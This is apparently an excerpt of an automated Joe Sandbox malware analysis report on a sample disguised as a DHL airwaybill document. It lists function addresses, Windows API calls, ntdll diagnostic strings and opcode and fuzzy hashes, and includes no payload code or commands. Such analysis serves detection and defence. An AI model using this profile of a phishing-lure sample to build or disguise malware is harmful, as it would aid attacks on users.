                • Instruction Fuzzy Hash: D2115631E40358B6D721AAA19C42FDE7F789F81B04F54805AFA047F282D2B85B078BA4
                Function 00413D68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71threadwindowCOMMON
                Download Yara Rule

                Control-flow Graph

                APIs
                • PostThreadMessageW.USER32(14_8-J-J8,00000111,00000000,00000000), ref: 00413E20
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381046112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Yara matches
                Similarity
                • API ID: MessagePostThread
                • String ID: 14_8-J-J8$14_8-J-J8
                • API String ID: 1836367815-2300785184
                • Opcode ID: 4211a35ea987d77079a32a73b8da01596c42a388fdaf48e8b746cfec4d63ddd4
                • Instruction ID: b33a30b9aef8fce91ad93595bc5e37a1282d957a91f1d26894ed66279e5e56a2
                • Opcode Fuzzy Hash: 4211a35ea987d77079a32a73b8da01596c42a388fdaf48e8b746cfec4d63ddd4
                • Instruction Fuzzy Hash: 9F11CE31E40358B6DB10DE95EC42FEEB77C9F81711F00409AFE04BB281C67857068B94
                Function 00413DA3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                Download Yara Rule

                Control-flow Graph

                APIs
                • PostThreadMessageW.USER32(14_8-J-J8,00000111,00000000,00000000), ref: 00413E20
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381046112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Yara matches
                Similarity
                • API ID: MessagePostThread
                • String ID: 14_8-J-J8$14_8-J-J8
                • API String ID: 1836367815-2300785184
                • Opcode ID: 8955294706800a699e96044b983d8c756050aa2286601525f533c1dce081a2ca
                • Instruction ID: ff93d9918aec8d798fd99780e109dc6153eb3e198b7779d86bf62f830ac42494
                • Opcode Fuzzy Hash: 8955294706800a699e96044b983d8c756050aa2286601525f533c1dce081a2ca
                • Instruction Fuzzy Hash: 3E01D671E4135876EB11A6919C42FDF7B7C8F80B54F448059FA047B281D6BC67068BE5
                Function 0042C653 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 89 42c653-42c697 call 404893 call 42d523 RtlFreeHeap
                APIs
                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,FFFEBCBD,00000007,00000000,00000004,00000000,00416DB1,000000F4), ref: 0042C692
                Memory Dump Source
                • Source File: 00000003.00000002.2381046112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Yara matches
                Similarity
                • API ID: FreeHeap
                • String ID:
                • API String ID: 3298025750-0
                • Opcode ID: 0e893eb5d20eb2c49f3964149c8d38e4493d492713042be715878a4d1694b429
                • Instruction ID: 283ad2e51c10a8fba1405b27d84f9dffca4c672f90b270f2d50781baacc0cdee
                • Opcode Fuzzy Hash: 0e893eb5d20eb2c49f3964149c8d38e4493d492713042be715878a4d1694b429
                • Instruction Fuzzy Hash: B1E06DB26043487BDA10EE99EC45EDB33ACDFC9714F404429FA08A7242CA70B95486B8
                Function 0042C603 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 84 42c603-42c647 call 404893 call 42d523 RtlAllocateHeap
                APIs
                • RtlAllocateHeap.NTDLL(?,0041E32E,?,?,00000000,?,0041E32E,?,?,?), ref: 0042C642
                Memory Dump Source
                • Source File: 00000003.00000002.2381046112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Yara matches
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: c8a19b05e8f33450ad0a94f44c71f626650ed0b1ae2f9d5f6ae6dc2fc0e2b896
                • Instruction ID: 4d465abb88dc65225f4144119b09d46a9def010d1789c6cee838552ffb039cb3
                • Opcode Fuzzy Hash: c8a19b05e8f33450ad0a94f44c71f626650ed0b1ae2f9d5f6ae6dc2fc0e2b896
                • Instruction Fuzzy Hash: 94E092B26003047BD610EE99EC45F9B73ACDFC8714F008429FE08A7242C670BD148BB8
                Function 0042C6A3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 99 42c6a3-42c6df call 404893 call 42d523 ExitProcess
                APIs
                • ExitProcess.KERNEL32(?,00000000,00000000,?,59AFE850,?,?,59AFE850), ref: 0042C6DA
                Memory Dump Source
                • Source File: 00000003.00000002.2381046112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Yara matches
                Similarity
                • API ID: ExitProcess
                • String ID:
                • API String ID: 621844428-0
                • Opcode ID: 69a78bd476d5e63909736fe786c0169ff5a96c18b16d6cc70b753916facb3464
                • Instruction ID: 00a0f72b7c72178c8b8cc87b9f96d3d25893befcc90453d079825a7ec5214e9c
                • Opcode Fuzzy Hash: 69a78bd476d5e63909736fe786c0169ff5a96c18b16d6cc70b753916facb3464
                • Instruction Fuzzy Hash: 98E0DFB62003007BC110BA9ADC01F97736CDFC5714F004029FA0CA7141C6B0B90087A0
                Function 01B42C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 104 1b42c0a-1b42c0f 105 1b42c11-1b42c18 104->105 106 1b42c1f-1b42c26 LdrInitializeThunk 104->106
                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: de8ff29385b03cd351c369c293bd367015154af1c22fa580c8a2e0740ad42ada
                • Instruction ID: 1f521794f0d1f3f753b457801d4a1acbb987baa1ea3c0bb7688d6a6d804599f6
                • Opcode Fuzzy Hash: de8ff29385b03cd351c369c293bd367015154af1c22fa580c8a2e0740ad42ada
                • Instruction Fuzzy Hash: 7EB09B729015C5C6DB55E76456087277900B7D0701F15C0E1F2030642F4778C1D1F675

                Non-executed Functions

                Function 01B82349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                • API String ID: 0-2160512332
                • Opcode ID: a4a3c8064102c60e1969b85aa114662fddd429634d29e68a34839de1a6212f6d
                • Instruction ID: e1c91fd39ef1e508ca058d1654079163946aade1ff9f874d8a9a0cbc7f8cabb1
                • Opcode Fuzzy Hash: a4a3c8064102c60e1969b85aa114662fddd429634d29e68a34839de1a6212f6d
                • Instruction Fuzzy Hash: 3D928F71604342AFEB29EE19C840B6BBBE8FF84B54F04499DFA95D7250D770E844CB52
                Function 01B38620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                Download Yara Rule
                Strings
                • Critical section address., xrefs: 01B75502
                • corrupted critical section, xrefs: 01B754C2
                • double initialized or corrupted critical section, xrefs: 01B75508
                • Critical section debug info address, xrefs: 01B7541F, 01B7552E
                • Critical section address, xrefs: 01B75425, 01B754BC, 01B75534
                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01B7540A, 01B75496, 01B75519
                • Thread identifier, xrefs: 01B7553A
                • Thread is in a state in which it cannot own a critical section, xrefs: 01B75543
                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01B754E2
                • Address of the debug info found in the active list., xrefs: 01B754AE, 01B754FA
                • 8, xrefs: 01B752E3
                • Invalid debug info address of this critical section, xrefs: 01B754B6
                • undeleted critical section in freed memory, xrefs: 01B7542B
                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01B754CE
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                • API String ID: 0-2368682639
                • Opcode ID: bc99ab0d1e5cdd810857fdb9866cdb6308e421e34785cac75b19f78099deb550
                • Instruction ID: ecae26f32875fd367d523b586e7af235421c404324ec8c4ff71418cbe0746527
                • Opcode Fuzzy Hash: bc99ab0d1e5cdd810857fdb9866cdb6308e421e34785cac75b19f78099deb550
                • Instruction Fuzzy Hash: BB81B9B1A00359BFDB24CF99C884BAEBBF5FB08B04F144199F615B7290D375A940CB60
                Function 01B329F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                Download Yara Rule
                Strings
                • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 01B722E4
                • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01B72624
                • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 01B724C0
                • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01B72412
                • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01B72409
                • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01B72506
                • @, xrefs: 01B7259B
                • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01B72602
                • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 01B725EB
                • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01B72498
                • RtlpResolveAssemblyStorageMapEntry, xrefs: 01B7261F
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                • API String ID: 0-4009184096
                • Opcode ID: 8ae4ecfa0491d0d2c945883da7acf599b36ac6d7438236852b2979f35726d4a5
                • Instruction ID: 83cabb5f9e8ee8b8c0d0506d4d2272404e18f2b8bbe243d7829e7c36ab87f0a5
                • Opcode Fuzzy Hash: 8ae4ecfa0491d0d2c945883da7acf599b36ac6d7438236852b2979f35726d4a5
                • Instruction Fuzzy Hash: 38025FF5D002299FDF25DB58CC80BAAB7B8AB54714F4041DAE709A7241EB309F94CF59
                Function 01BA8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                • API String ID: 0-2515994595
                • Opcode ID: 5e56b642bf1d2cececbbc41785da7895fcf3d5e13daa258916afe8286bef4ced
                • Instruction ID: 7467c14e5a3e075127a660198d4fd30ecb05200c69da74ae48d25b9ca68a9386
                • Opcode Fuzzy Hash: 5e56b642bf1d2cececbbc41785da7895fcf3d5e13daa258916afe8286bef4ced
                • Instruction Fuzzy Hash: 5251F0711087119BC72EDF188844BABBBE8FF94244F944A9EE999C3640E770D644CBD2
                Function 01BB0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                • API String ID: 0-1700792311
                • Opcode ID: a0d00a56b3fe560b203a5cbea081d3dbe061a3182edcb124a63384a71e8276af
                • Instruction ID: d9422ecb9ea7ff30cc1135349dd153646278f5b7d409d776acbfb177d6c4e1ce
                • Opcode Fuzzy Hash: a0d00a56b3fe560b203a5cbea081d3dbe061a3182edcb124a63384a71e8276af
                • Instruction Fuzzy Hash: 21D1BF31500685EFDB2AEFA8C480AFEBBF1FF59610F18809DF5469BA52C7B49945CB10
                Function 01B889B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                Download Yara Rule
                Strings
                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01B88A67
                • HandleTraces, xrefs: 01B88C8F
                • AVRF: -*- final list of providers -*- , xrefs: 01B88B8F
                • VerifierDlls, xrefs: 01B88CBD
                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01B88A3D
                • VerifierFlags, xrefs: 01B88C50
                • VerifierDebug, xrefs: 01B88CA5
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                • API String ID: 0-3223716464
                • Opcode ID: 05263f1803c06e1ece0ced88c38b8b8350c740feab422aae8c7f1e73330ad494
                • Instruction ID: d7a48993c9bff7b2a2d26a4df2722df991865636dc582f43922c437f09cbaa8c
                • Opcode Fuzzy Hash: 05263f1803c06e1ece0ced88c38b8b8350c740feab422aae8c7f1e73330ad494
                • Instruction Fuzzy Hash: A5911671641716AFDB39FF689880F2A7BA8EB94F14F8505DCFA45AB241C730AC05CB91
                Function 01B0EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                • API String ID: 0-1109411897
                • Opcode ID: aa00c7d68c2808d45f4f467ec02391f21620057239f08e61bb175f4e30d4f664
                • Instruction ID: ed4d9b030f8f1d8d7a0d06f934900e3341a96cbb53f95d262289bbaa02192314
                • Opcode Fuzzy Hash: aa00c7d68c2808d45f4f467ec02391f21620057239f08e61bb175f4e30d4f664
                • Instruction Fuzzy Hash: CCA24870A0562A8FDF79DF19C9887A9BBB5EF59304F1442E9D90DA7290DB349E81CF00
                Function 01B363FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                • API String ID: 0-792281065
                • Opcode ID: 1988306780e65981a1828ebe5b7ae4414d83e68eb18b4bda899d17d866bfe219
                • Instruction ID: 287b7ecfc01829c64e836732a389576ec4ddabbe0e8280886480110ba724b9ae
                • Opcode Fuzzy Hash: 1988306780e65981a1828ebe5b7ae4414d83e68eb18b4bda899d17d866bfe219
                • Instruction Fuzzy Hash: 05911670B01315ABEF3DEF18E848BAA7BA5FF80B14F1401EDE9216B681DB709951C791
                Function 01AF645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                Download Yara Rule
                Strings
                • Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 01B599ED
                • LdrpInitShimEngine, xrefs: 01B599F4, 01B59A07, 01B59A30
                • Loading the shim user DLL failed with status 0x%08lx, xrefs: 01B59A2A
                • minkernel\ntdll\ldrinit.c, xrefs: 01B59A11, 01B59A3A
                • Getting the shim user exports failed with status 0x%08lx, xrefs: 01B59A01
                • apphelp.dll, xrefs: 01AF6496
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                • API String ID: 0-204845295
                • Opcode ID: aa90b3edc30b047eec623c951e93d9701b45b47b24ed420ea91d9cc59c9314bf
                • Instruction ID: 5f1a373de75cd77bf29b95c763a25a29437e0b7e588d75b713da5428a73db7c9
                • Opcode Fuzzy Hash: aa90b3edc30b047eec623c951e93d9701b45b47b24ed420ea91d9cc59c9314bf
                • Instruction Fuzzy Hash: E8519F71208305EBEB29EF64D945F6B77E8FB84748F04095EFA8997161D730E904CBA2
                Function 01B3C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                Download Yara Rule
                Strings
                • Unable to build import redirection Table, Status = 0x%x, xrefs: 01B781E5
                • minkernel\ntdll\ldrredirect.c, xrefs: 01B78181, 01B781F5
                • minkernel\ntdll\ldrinit.c, xrefs: 01B3C6C3
                • LdrpInitializeProcess, xrefs: 01B3C6C4
                • Loading import redirection DLL: '%wZ', xrefs: 01B78170
                • LdrpInitializeImportRedirection, xrefs: 01B78177, 01B781EB
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                • API String ID: 0-475462383
                • Opcode ID: 578786cf2b290b37f4437f088cfe1361bd51349c4771beb03756b891125a6303
                • Instruction ID: acd8e3fd995f46fbe4d3b382aea96e5cf4eee5623fb0fff44fa915d70c75ea2c
                • Opcode Fuzzy Hash: 578786cf2b290b37f4437f088cfe1361bd51349c4771beb03756b891125a6303
                • Instruction Fuzzy Hash: 8431F571644306AFC628EF69D949E1A7BE4FF94B10F0405DCF945AB291DB20EC08C7A2
                Function 01B32674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                Download Yara Rule
                Strings
                • RtlGetAssemblyStorageRoot, xrefs: 01B72160, 01B7219A, 01B721BA
                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01B7219F
                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01B721BF
                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01B72178
                • SXS: %s() passed the empty activation context, xrefs: 01B72165
                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01B72180
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                • API String ID: 0-861424205
                • Opcode ID: d81416985f5b1591544c09413a1eb2d7a73e12652cda379c518cdab6dba106cd
                • Instruction ID: 8a54ead98fe7d62dafdcf78e4f473cd57b331e6facc67053dd8419e41f979562
                • Opcode Fuzzy Hash: d81416985f5b1591544c09413a1eb2d7a73e12652cda379c518cdab6dba106cd
                • Instruction Fuzzy Hash: BF31E93AF40215B7EB2A9A9ADC45F6A7B78FBA4A50F0501DDFB1467240D3709E40C7E1
                Function 01B4096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 01B42DF0: LdrInitializeThunk.NTDLL ref: 01B42DFA
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01B40BA3
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01B40BB6
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01B40D60
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01B40D74
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                • String ID:
                • API String ID: 1404860816-0
                • Opcode ID: 135d2adc227fcdc7e99261a7d581efdc5b3b8697ecab1ecdd70d6ab64ea5817c
                • Instruction ID: ab779051c62dc10b274de4f02114594dbc12297cca823edbadc5ad3dad482b13
                • Opcode Fuzzy Hash: 135d2adc227fcdc7e99261a7d581efdc5b3b8697ecab1ecdd70d6ab64ea5817c
                • Instruction Fuzzy Hash: F2425A71900715DFDB29DF28C880BAAB7F4FF08314F1485E9EA999B241E770A984DF61
                Function 01B0A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                • API String ID: 0-379654539
                • Opcode ID: bb7408a5bce2c6298c7fdb0e4d0aedb6c9f29cbd06aff5ecce845b90bbdeff89
                • Instruction ID: 9647d0645c44a5a4b7f8015bd1f5e808bb6822c0c6bdd244e90e174b02da6fc2
                • Opcode Fuzzy Hash: bb7408a5bce2c6298c7fdb0e4d0aedb6c9f29cbd06aff5ecce845b90bbdeff89
                • Instruction Fuzzy Hash: 94C18F75108382CFD71ADF68C040B6ABBE4FF94704F048DA9F9968B291E739D949CB52
                Function 01B38402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                Download Yara Rule
                Strings
                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 01B3855E
                • minkernel\ntdll\ldrinit.c, xrefs: 01B38421
                • LdrpInitializeProcess, xrefs: 01B38422
                • @, xrefs: 01B38591
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                • API String ID: 0-1918872054
                • Opcode ID: 22ffce2c931423c5039ca518c58ad673634d53078996f8b423f6d3cdcbad2173
                • Instruction ID: 9be73eaaf5239a9ac9f6f6280131a26b28acba3531dba52e7f1b9aba5984e597
                • Opcode Fuzzy Hash: 22ffce2c931423c5039ca518c58ad673634d53078996f8b423f6d3cdcbad2173
                • Instruction Fuzzy Hash: CB91AD71548345AFDB2ADF65DC40EABBAE8FF84640F404AAEFA84D2150E334D9149B63
                Function 01B3273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                Download Yara Rule
                Strings
                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 01B721D9, 01B722B1
                • .Local, xrefs: 01B328D8
                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 01B722B6
                • SXS: %s() passed the empty activation context, xrefs: 01B721DE
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                • API String ID: 0-1239276146
                • Opcode ID: 80bb613e6aa019236f0c04c4d4bf9c62a85e87f3765c6e712e1a1ad9e8153a84
